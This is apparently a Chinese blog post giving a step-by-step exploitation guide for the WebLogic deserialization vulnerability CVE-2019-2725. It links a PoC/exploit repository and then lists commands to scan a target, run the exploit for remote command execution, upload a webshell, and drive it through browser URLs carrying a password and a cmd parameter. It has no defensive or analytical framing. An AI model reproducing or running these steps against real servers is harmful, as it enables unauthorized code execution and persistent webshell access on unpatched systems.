weblogic漏洞系列
漏洞验证
POC下载:https://github.com/TopScrew/CVE-2019-2725
路径kali:/POCandEXP
进入脚本目录:cd /POCandEXP/weblogic/POC
命令:python3 WeblogicScan.py 1.1.1.14 7001
CVE-2019-2725
EXP下载:https://github.com/TopScrew/CVE-2019-2725
安装所需环境:sudo pip3 install logzero
命令回显
命令:python3 weblogic-2019-2725.py 10.3.6 http://1.1.1.14:7001 whoami
webshel??l上传
命令:python3 weblogic-2019-2725.py 10.3.6 http://1.1.1.14:7001
浏览器输入payload:http://1.1.1.14:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=ifconfig
windows服务器payload:http://1.1.1.14:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=ipconfig
推荐阅读
- CVE-2020-16898|CVE-2020-16898 TCP/IP远程代码执行漏洞
- 【欢喜是你·三宅系列①】⑶
- 难道你仅会钻规则的漏洞吗()
- 你不可不知的真相系列之科学
- 人脸识别|【人脸识别系列】| 实现自动化妆
- 2018-06-13金句系列7(金句结构-改编古现代诗词)
- Unity和Android通信系列文章2——扩展UnityPlayerActivity
- 乡野村趣系列之烧仙草
- Java内存泄漏分析系列之二(jstack生成的Thread|Java内存泄漏分析系列之二:jstack生成的Thread Dump日志结构解析)
- 15、IDEA学习系列之其他设置(生成javadoc、缓存和索引的清理等)